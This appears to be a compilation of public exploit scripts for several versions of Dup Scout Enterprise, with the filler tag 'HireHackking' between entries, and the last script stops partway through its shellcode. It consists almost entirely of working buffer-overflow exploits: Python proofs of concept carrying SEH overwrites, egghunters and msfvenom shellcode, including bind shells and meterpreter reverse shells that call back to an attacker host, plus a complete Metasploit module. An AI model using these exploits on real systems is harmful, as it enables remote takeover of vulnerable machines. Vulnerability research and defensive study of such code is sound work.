# Exploit Author: Greg Priest
# Version: Dup Scout Enterprise v9.7.18
# Tested on: Windows7 x64 HUN/ENG Professional
'''


import os
import struct

overflow = "A" * 1536
jmp_esp = "\x94\x21\x1C\x65"
#651F20E5 
#651F214E
#652041ED
nop = "\x90" * 16
esp = "\x8D\x44\x24\x4A"
jmp = "\xFF\xE0"
nop2 = "\x90" * 70
nSEH = "\x90\x90\xEB\x05"
SEH = "\x80\x5F\x1C\x90"
#"\x80\x5F\x1C\x65"
#6508F78D
#650E129F
#651C5F80
shellcode =(
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
"\x45\x81\x3e\x43\x72\x65\x61\x75" +
"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
"\x53\x53\x53\x53\x52\x53\xff\xd7")

crash = overflow+jmp_esp+nop+esp+jmp+nop2+nSEH+SEH+"\x90" * 10+shellcode

evil = '<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + crash + '\n</classify>'
exploit = open('Ev1l.xml', 'w')
exploit.write(evil)
exploit.close()

print "Ev1l.xml raedy!"
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Seh
  include Msf::Exploit::Remote::Egghunter
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Dup Scout Enterprise GET Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack-based buffer overflow vulnerability
        in the web interface of Dup Scout Enterprise v9.5.14, caused by
        improper bounds checking of the request path in HTTP GET requests
        sent to the built-in web server. This module has been tested
        successfully on Windows 7 SP1 x86.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'vportal',	     # Vulnerability discovery and PoC
          'Daniel Teixeira'  # Metasploit module
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars'   => "\x00\x09\x0a\x0d\x20\x26",
          'Space'      => 500
        },
      'Targets'        =>
        [
          [ 'Dup Scout Enterprise v9.5.14',
            {
              'Offset' => 2488,
              'Ret'    => 0x10050ff3  # POP # POP # RET [libspp.dll]
            }
          ]
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Mar 15 2017',
      'DefaultTarget'  => 0))
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/'
    )

    if res && res.code == 200
      version = res.body[/Dup Scout Enterprise v[^<]*/]
      if version
        vprint_status("Version detected: #{version}")
        if version =~ /9\.5\.14/
          return Exploit::CheckCode::Appears
        end
        return Exploit::CheckCode::Detected
      end
    else
      vprint_error('Unable to determine due to a HTTP connection timeout')
      return Exploit::CheckCode::Unknown
    end

    Exploit::CheckCode::Safe
  end

  def exploit

    eggoptions = {
      checksum: true,
      eggtag: rand_text_alpha(4, payload_badchars)
    }

    hunter, egg = generate_egghunter(
      payload.encoded,
      payload_badchars,
      eggoptions
    )

    sploit =  rand_text_alpha(target['Offset'])
    sploit << generate_seh_record(target.ret)
    sploit << hunter
    sploit << make_nops(10)
    sploit << egg
    sploit << rand_text_alpha(5500)

    print_status('Sending request...')

    send_request_cgi(
      'method' => 'GET',
      'uri'    => sploit
    )
  end
end
HireHackking 
#!/usr/bin/python
#Open the DupScout client and click on Tools > click on Connect Network Drive > type the content of boom.txt in the "User Name" field. The payload is sent to the DupScout server (port 9126)
#SEH based stack overflow in DupScout server
#Tested in Windows 7 Professional
#For educational proposes only

#msfvenom -a x86 --platform windows -p windows/shell/bind_tcp LPORT=4444 -e x86/alpha_mixed BufferRegister=EAX -f python
buf =  ""
buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x49\x6c\x49\x78\x6f\x72\x47\x70\x57\x70\x45\x50\x43"
buf += "\x50\x4e\x69\x49\x75\x30\x31\x59\x50\x31\x74\x4e\x6b"
buf += "\x30\x50\x34\x70\x4e\x6b\x53\x62\x66\x6c\x4c\x4b\x36"
buf += "\x32\x45\x44\x4e\x6b\x52\x52\x44\x68\x34\x4f\x6d\x67"
buf += "\x71\x5a\x51\x36\x76\x51\x49\x6f\x6c\x6c\x57\x4c\x70"
buf += "\x61\x61\x6c\x53\x32\x34\x6c\x61\x30\x4b\x71\x38\x4f"
buf += "\x44\x4d\x43\x31\x78\x47\x4b\x52\x4c\x32\x72\x72\x42"
buf += "\x77\x4e\x6b\x36\x32\x44\x50\x6c\x4b\x72\x6a\x45\x6c"
buf += "\x4e\x6b\x62\x6c\x32\x31\x51\x68\x4d\x33\x71\x58\x36"
buf += "\x61\x78\x51\x72\x71\x4c\x4b\x30\x59\x65\x70\x66\x61"
buf += "\x4a\x73\x6c\x4b\x73\x79\x72\x38\x7a\x43\x64\x7a\x43"
buf += "\x79\x6c\x4b\x46\x54\x6c\x4b\x36\x61\x6a\x76\x75\x61"
buf += "\x49\x6f\x4e\x4c\x5a\x61\x48\x4f\x34\x4d\x55\x51\x4b"
buf += "\x77\x74\x78\x6b\x50\x74\x35\x6b\x46\x35\x53\x73\x4d"
buf += "\x68\x78\x77\x4b\x43\x4d\x31\x34\x62\x55\x4b\x54\x33"
buf += "\x68\x4e\x6b\x73\x68\x64\x64\x66\x61\x58\x53\x73\x56"
buf += "\x6e\x6b\x74\x4c\x50\x4b\x6e\x6b\x73\x68\x75\x4c\x57"
buf += "\x71\x38\x53\x4c\x4b\x44\x44\x6e\x6b\x77\x71\x4e\x30"
buf += "\x6b\x39\x77\x34\x65\x74\x37\x54\x51\x4b\x53\x6b\x30"
buf += "\x61\x46\x39\x43\x6a\x42\x71\x69\x6f\x79\x70\x53\x6f"
buf += "\x53\x6f\x43\x6a\x6e\x6b\x66\x72\x7a\x4b\x4e\x6d\x71"
buf += "\x4d\x71\x78\x74\x73\x70\x32\x65\x50\x75\x50\x75\x38"
buf += "\x34\x37\x54\x33\x56\x52\x71\x4f\x56\x34\x63\x58\x30"
buf += "\x4c\x74\x37\x46\x46\x56\x67\x49\x6f\x4b\x65\x58\x38"
buf += "\x4c\x50\x35\x51\x73\x30\x65\x50\x55\x79\x4b\x74\x71"
buf += "\x44\x30\x50\x71\x78\x51\x39\x4b\x30\x32\x4b\x55\x50"
buf += "\x6b\x4f\x4b\x65\x62\x4a\x66\x6b\x51\x49\x56\x30\x69"
buf += "\x72\x69\x6d\x51\x7a\x65\x51\x32\x4a\x37\x72\x73\x58"
buf += "\x6b\x5a\x76\x6f\x4b\x6f\x4b\x50\x6b\x4f\x59\x45\x5a"
buf += "\x37\x73\x58\x76\x62\x53\x30\x77\x61\x43\x6c\x6b\x39"
buf += "\x48\x66\x43\x5a\x42\x30\x62\x76\x43\x67\x30\x68\x5a"
buf += "\x62\x79\x4b\x54\x77\x53\x57\x6b\x4f\x79\x45\x4f\x75"
buf += "\x6f\x30\x51\x65\x36\x38\x66\x37\x42\x48\x58\x37\x4d"
buf += "\x39\x45\x68\x49\x6f\x49\x6f\x6b\x65\x32\x77\x70\x68"
buf += "\x52\x54\x5a\x4c\x67\x4b\x6d\x31\x69\x6f\x38\x55\x30"
buf += "\x57\x6a\x37\x52\x48\x44\x35\x50\x6e\x70\x4d\x73\x51"
buf += "\x49\x6f\x4e\x35\x62\x4a\x65\x50\x50\x6a\x54\x44\x30"
buf += "\x56\x66\x37\x31\x78\x46\x62\x4a\x79\x78\x48\x71\x4f"
buf += "\x69\x6f\x5a\x75\x4f\x73\x6b\x48\x35\x50\x53\x4e\x66"
buf += "\x4d\x4e\x6b\x45\x66\x73\x5a\x37\x30\x52\x48\x35\x50"
buf += "\x76\x70\x75\x50\x53\x30\x43\x66\x50\x6a\x43\x30\x30"
buf += "\x68\x62\x78\x49\x34\x32\x73\x7a\x45\x4b\x4f\x68\x55"
buf += "\x4d\x43\x56\x33\x70\x6a\x55\x50\x46\x36\x62\x73\x53"
buf += "\x67\x32\x48\x35\x52\x6b\x69\x78\x48\x51\x4f\x79\x6f"
buf += "\x79\x45\x6d\x53\x69\x68\x37\x70\x53\x4e\x67\x77\x46"
buf += "\x61\x39\x53\x55\x79\x6b\x76\x34\x35\x7a\x49\x6f\x33"
buf += "\x41\x41"

nseh = "\x54\x58\x41\x41"
seh = "\x4f\x40\x12\x10"

align = "\x05\x34\x28\x25\x41" #add eax,0x41252843
align += "\x2d\x7e\43\x25\x41" #sub eax,0x4125437e
align += "\x50" #push eax
align += "\xc3" #ret

offset = 1584

buffer = "\x41"*175 + buf 
buffer += "\x42"*(offset-175-len(buf)) 
buffer += nseh + seh 
buffer += align + "\x44"*(1000-len(align))

file = open('boom.txt','w')
file.write(buffer)
file.close()
HireHackking 
#!/usr/bin/python

print "Dup Scout Enterprise 9.1.14 Login Buffer Overflow"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"

#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security

#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1

#Vendor has been notified on multiple occasions
#Exploit for version 9.0.28: www.exploit-db.com/exploits/40457/

#Shout-out to carbonated and ozzie_offsec

import socket
import sys

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.130',80))


#bad chars \x00\x0a\x0d\x26


#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest

#payload size 308



buf =  ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"


#pop pop ret 1004FAF3

nseh = "\x90\x90\xEB\x0B"
seh = "\xF3\xFA\x04\x10"

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

evil =  "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "B" * 100
evil += "w00tw00t"
evil += buf
evil += "\x90" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += egghunter
evil += "\x90" * 8672


print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
HireHackking 
#!/usr/bin/python

print "Dup Scout Enterprise 9.0.28 Buffer Overflow Exploit"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"

#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security

#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1

#Shout-out to carbonated and ozzie_offsec

import socket
import sys

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.132',80))

#bad chars \x00\x0a\x0d\x26

#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest

#payload size 308

buf =  ""
buf += "\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b"
buf += "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9"
buf += "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda"
buf += "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a"
buf += "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8"
buf += "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c"
buf += "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1"
buf += "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76"
buf += "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27"
buf += "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb"
buf += "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4"
buf += "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17"
buf += "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40"
buf += "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55"
buf += "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa"
buf += "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48"
buf += "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b"
buf += "\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8"
buf += "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84"
buf += "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6"
buf += "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c"
buf += "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1"
buf += "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f"
buf += "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc"

#pop pop ret 1006cd33

nseh = "\x90\x90\xEB\x0B"
seh = "\x33\xcd\x06\x10"

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"


evil =  "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 12292 #subtract/add for payload
evil += "w00tw00t"
evil += "\x90" * 20
evil += buf
evil += "\x90" * 50
evil += "\x42" * 1614
evil += nseh
evil += seh
evil += "\x90" * 20
evil += egghunter
evil += "\x90" * 7000

print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
HireHackking 
#!/usr/bin/python

#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: Dup Scout Enterprise 10.5.12 - Local Buffer Overflow
# Date: 02-22-2018
# Vulnerable Software: Dup Scout Enterprise v10.5.12
# Vendor Homepage: http://www.dupscout.com
# Version: 10.5.12
# Software Link: http://www.dupscout.com/downloads.html
# Tested On: Windows 7 x86
#
# bad chars \x00\x0a and everything above \x80
#
# PoC: 
# 1. generate dupscout.txt, copy contents to clipboard
# 2. open app, select Server, select Connect
# 3. type anything into Share Name, paste dupscout.txt contents into User Name
# 4. select Connect and then OK
# 5. pop calc
#

filename="dupscout.txt"

junk = "A"*792

#0x10021144 : push esp # ret  | ascii {PAGE_EXECUTE_READ} [libspg.dll]
eip = "\x44\x11\x02\x10"

fill = "\x43"*560

#msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=ESP -f c
#Payload size: 440 bytes
calc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6b\x58\x6b\x32\x53\x30"
"\x57\x70\x67\x70\x53\x50\x4e\x69\x39\x75\x54\x71\x39\x50\x61"
"\x74\x6c\x4b\x66\x30\x44\x70\x6c\x4b\x73\x62\x46\x6c\x6e\x6b"
"\x66\x32\x66\x74\x4e\x6b\x62\x52\x65\x78\x44\x4f\x78\x37\x72"
"\x6a\x46\x46\x44\x71\x6b\x4f\x4c\x6c\x57\x4c\x53\x51\x51\x6c"
"\x47\x72\x34\x6c\x47\x50\x69\x51\x6a\x6f\x64\x4d\x37\x71\x59"
"\x57\x6d\x32\x5a\x52\x51\x42\x61\x47\x4e\x6b\x36\x32\x44\x50"
"\x6c\x4b\x73\x7a\x55\x6c\x4c\x4b\x42\x6c\x52\x31\x63\x48\x6d"
"\x33\x32\x68\x43\x31\x5a\x71\x53\x61\x6c\x4b\x36\x39\x31\x30"
"\x73\x31\x4e\x33\x4c\x4b\x50\x49\x65\x48\x39\x73\x46\x5a\x37"
"\x39\x4e\x6b\x64\x74\x4e\x6b\x63\x31\x78\x56\x35\x61\x6b\x4f"
"\x6e\x4c\x39\x51\x7a\x6f\x46\x6d\x63\x31\x4b\x77\x50\x38\x6d"
"\x30\x32\x55\x79\x66\x35\x53\x71\x6d\x78\x78\x57\x4b\x61\x6d"
"\x35\x74\x70\x75\x69\x74\x30\x58\x4c\x4b\x30\x58\x31\x34\x75"
"\x51\x69\x43\x70\x66\x4c\x4b\x44\x4c\x50\x4b\x6c\x4b\x42\x78"
"\x75\x4c\x76\x61\x4e\x33\x4e\x6b\x57\x74\x4e\x6b\x55\x51\x6a"
"\x70\x4d\x59\x67\x34\x67\x54\x77\x54\x63\x6b\x53\x6b\x33\x51"
"\x42\x79\x73\x6a\x33\x61\x69\x6f\x59\x70\x61\x4f\x61\x4f\x42"
"\x7a\x6e\x6b\x34\x52\x58\x6b\x6e\x6d\x61\x4d\x62\x4a\x35\x51"
"\x4c\x4d\x4f\x75\x4f\x42\x73\x30\x33\x30\x63\x30\x46\x30\x42"
"\x48\x45\x61\x6e\x6b\x52\x4f\x4d\x57\x6b\x4f\x4a\x75\x4d\x6b"
"\x4c\x30\x58\x35\x39\x32\x51\x46\x51\x78\x49\x36\x4a\x35\x6f"
"\x4d\x4d\x4d\x59\x6f\x4a\x75\x55\x6c\x54\x46\x31\x6c\x65\x5a"
"\x6d\x50\x59\x6b\x49\x70\x31\x65\x37\x75\x4f\x4b\x73\x77\x62"
"\x33\x62\x52\x52\x4f\x53\x5a\x73\x30\x76\x33\x79\x6f\x68\x55"
"\x62\x43\x70\x61\x42\x4c\x35\x33\x76\x4e\x53\x55\x30\x78\x43"
"\x55\x43\x30\x41\x41")

buffer = junk + eip + calc + fill
 
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
HireHackking 
# Exploit Title: Dup Scout Enterprise 10.0.18 - 'sid' Remote Buffer Overflow (SEH)
# Date: 2020-12-08
# Exploit Author: Andrés Roldán
# Vendor Homepage: http://www.dupscout.com
# Software Link: http://www.dupscout.com/downloads.html
# Version: 10.0.18
# Tested on: Windows 10 Pro x64

#!/usr/bin/env python3

import socket
import struct

HOST = '127.0.0.1'
PORT = 80

# msfvenom --platform windows --arch x86 -p windows/shell_bind_tcp -b "\x00\0x9\x0a\x0d\x20" -f python -v SHELL
SHELL =  b""
SHELL += b"\x29\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e"
SHELL += b"\x81\x76\x0e\xfa\xfa\xc4\x90\x83\xee\xfc\xe2\xf4"
SHELL += b"\x06\x12\x46\x90\xfa\xfa\xa4\x19\x1f\xcb\x04\xf4"
SHELL += b"\x71\xaa\xf4\x1b\xa8\xf6\x4f\xc2\xee\x71\xb6\xb8"
SHELL += b"\xf5\x4d\x8e\xb6\xcb\x05\x68\xac\x9b\x86\xc6\xbc"
SHELL += b"\xda\x3b\x0b\x9d\xfb\x3d\x26\x62\xa8\xad\x4f\xc2"
SHELL += b"\xea\x71\x8e\xac\x71\xb6\xd5\xe8\x19\xb2\xc5\x41"
SHELL += b"\xab\x71\x9d\xb0\xfb\x29\x4f\xd9\xe2\x19\xfe\xd9"
SHELL += b"\x71\xce\x4f\x91\x2c\xcb\x3b\x3c\x3b\x35\xc9\x91"
SHELL += b"\x3d\xc2\x24\xe5\x0c\xf9\xb9\x68\xc1\x87\xe0\xe5"
SHELL += b"\x1e\xa2\x4f\xc8\xde\xfb\x17\xf6\x71\xf6\x8f\x1b"
SHELL += b"\xa2\xe6\xc5\x43\x71\xfe\x4f\x91\x2a\x73\x80\xb4"
SHELL += b"\xde\xa1\x9f\xf1\xa3\xa0\x95\x6f\x1a\xa5\x9b\xca"
SHELL += b"\x71\xe8\x2f\x1d\xa7\x92\xf7\xa2\xfa\xfa\xac\xe7"
SHELL += b"\x89\xc8\x9b\xc4\x92\xb6\xb3\xb6\xfd\x05\x11\x28"
SHELL += b"\x6a\xfb\xc4\x90\xd3\x3e\x90\xc0\x92\xd3\x44\xfb"
SHELL += b"\xfa\x05\x11\xfa\xf2\xa3\x94\x72\x07\xba\x94\xd0"
SHELL += b"\xaa\x92\x2e\x9f\x25\x1a\x3b\x45\x6d\x92\xc6\x90"
SHELL += b"\xeb\xa6\x4d\x76\x90\xea\x92\xc7\x92\x38\x1f\xa7"
SHELL += b"\x9d\x05\x11\xc7\x92\x4d\x2d\xa8\x05\x05\x11\xc7"
SHELL += b"\x92\x8e\x28\xab\x1b\x05\x11\xc7\x6d\x92\xb1\xfe"
SHELL += b"\xb7\x9b\x3b\x45\x92\x99\xa9\xf4\xfa\x73\x27\xc7"
SHELL += b"\xad\xad\xf5\x66\x90\xe8\x9d\xc6\x18\x07\xa2\x57"
SHELL += b"\xbe\xde\xf8\x91\xfb\x77\x80\xb4\xea\x3c\xc4\xd4"
SHELL += b"\xae\xaa\x92\xc6\xac\xbc\x92\xde\xac\xac\x97\xc6"
SHELL += b"\x92\x83\x08\xaf\x7c\x05\x11\x19\x1a\xb4\x92\xd6"
SHELL += b"\x05\xca\xac\x98\x7d\xe7\xa4\x6f\x2f\x41\x34\x25"
SHELL += b"\x58\xac\xac\x36\x6f\x47\x59\x6f\x2f\xc6\xc2\xec"
SHELL += b"\xf0\x7a\x3f\x70\x8f\xff\x7f\xd7\xe9\x88\xab\xfa"
SHELL += b"\xfa\xa9\x3b\x45"

PAYLOAD = (
    b'\x90' * (2482 - len(SHELL)) +
    SHELL +
    b'\xeb\x10\x90\x90' +
    # 0x1002071c: add esp,8 # ret 0x04 at libspp.dll (ASLR: False, Rebase: False, SafeSEH: False)
    struct.pack('<L', 0x1002071c) +
    b'\x90' * 32  +
    b'\xE9\x4D\xF6\xFF\xFF' +
    b'C' * (10000 - 2482 - 4 - 32 - len(SHELL))
)

HTTP_PAYLOAD = (
    b'GET /settings&sid=' + PAYLOAD + b' HTTP/1.1\r\n' +
    b'Host: ' + HOST.encode() +
    b'\r\n\r\n'
)

with socket.create_connection((HOST, PORT)) as fd:
    print('[+] Sending payload...')
    fd.sendall(HTTP_PAYLOAD)
    print('[+] Done. Check for a shell on port 4444.')
HireHackking 
# Dup Scout Enterprise 10.0.18 - 'online_registration' Remote Buffer Overflow
# Requires web service to be enabled.
# Tested on Windows 10 Pro (x64)
# Based on: https://www.exploit-db.com/exploits/43145 and https://www.exploit-db.com/exploits/40457
# Credits: Tulpa and SICKNESS for original exploits
# Modified: @0rbz_

import socket,os,time,struct,argparse,sys

parser = argparse.ArgumentParser()
parser.add_argument('--host', required=True)
args = parser.parse_args()

host = args.host
port = 80

# msfvenom --platform windows -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d\x25\x26\x2b\x3d" -f py

buf =  ""
buf += "\xb8\xa0\xa1\xfd\x38\xd9\xf7\xd9\x74\x24\xf4\x5a\x31"
buf += "\xc9\xb1\x31\x31\x42\x13\x83\xc2\x04\x03\x42\xaf\x43"
buf += "\x08\xc4\x47\x01\xf3\x35\x97\x66\x7d\xd0\xa6\xa6\x19"
buf += "\x90\x98\x16\x69\xf4\x14\xdc\x3f\xed\xaf\x90\x97\x02"
buf += "\x18\x1e\xce\x2d\x99\x33\x32\x2f\x19\x4e\x67\x8f\x20"
buf += "\x81\x7a\xce\x65\xfc\x77\x82\x3e\x8a\x2a\x33\x4b\xc6"
buf += "\xf6\xb8\x07\xc6\x7e\x5c\xdf\xe9\xaf\xf3\x54\xb0\x6f"
buf += "\xf5\xb9\xc8\x39\xed\xde\xf5\xf0\x86\x14\x81\x02\x4f"
buf += "\x65\x6a\xa8\xae\x4a\x99\xb0\xf7\x6c\x42\xc7\x01\x8f"
buf += "\xff\xd0\xd5\xf2\xdb\x55\xce\x54\xaf\xce\x2a\x65\x7c"
buf += "\x88\xb9\x69\xc9\xde\xe6\x6d\xcc\x33\x9d\x89\x45\xb2"
buf += "\x72\x18\x1d\x91\x56\x41\xc5\xb8\xcf\x2f\xa8\xc5\x10"
buf += "\x90\x15\x60\x5a\x3c\x41\x19\x01\x2a\x94\xaf\x3f\x18"
buf += "\x96\xaf\x3f\x0c\xff\x9e\xb4\xc3\x78\x1f\x1f\xa0\x77"
buf += "\x55\x02\x80\x1f\x30\xd6\x91\x7d\xc3\x0c\xd5\x7b\x40"
buf += "\xa5\xa5\x7f\x58\xcc\xa0\xc4\xde\x3c\xd8\x55\x8b\x42"
